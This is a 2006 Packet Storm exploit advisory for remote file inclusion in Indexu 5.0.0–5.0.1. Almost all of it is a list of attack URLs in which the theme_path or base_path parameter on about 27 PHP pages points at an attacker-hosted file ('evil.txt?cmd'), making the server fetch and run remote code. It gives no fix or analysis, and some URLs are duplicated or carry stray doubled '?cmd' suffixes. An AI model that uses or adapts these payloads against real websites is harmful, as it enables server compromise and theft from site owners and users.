Indexu-5.0.1.txt

2006-04-12T00:00:00
ID PACKETSTORM:45362
Type packetstorm
Reporter SnIpEr_SA
Modified 2006-04-12T00:00:00

Description

                                        
                                            `  
Application : Indexu  
version : 5.0.0 5.0.1  
URL : http://www.nicecoder.com/  
  
  
  
Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit  
  
Discovery by SnIpEr_SA  
  
in (theme_path)  
this file :  
exploit:  
http://example.com/indexu/index.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/become_editor.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/add.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/bad_link.php?theme_path=http://evil.txt  
  
http://example.com/indexu/browse.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/detail.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/fav.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/get_rated.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/login.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/mailing_list.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/new.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/modify.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/pick.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/power_search.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd  
  
http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/register.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/review.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/rss.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/search.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/send_pwd.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/sendmail.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/tell_friend.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/top_rated.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/user_detail.php?theme_path=http://evil.txt?cmd?cmd  
  
http://example.com/indexu/user_search.php?theme_path=http://evil.txt?cmd?cmd  
  
---------------------------   
  
in (base_path)  
  
in this file:  
  
invoice.php  
  
expliot:  
  
http://example.com/indexu/invoice.php?base_path=http://evil.txt?cmd?cmd  
  
-------------------  
  
  
www.3asfh.com  
  
www.lezr.com  
  
<<<<  
Discovered By SnIpEr_SA  
`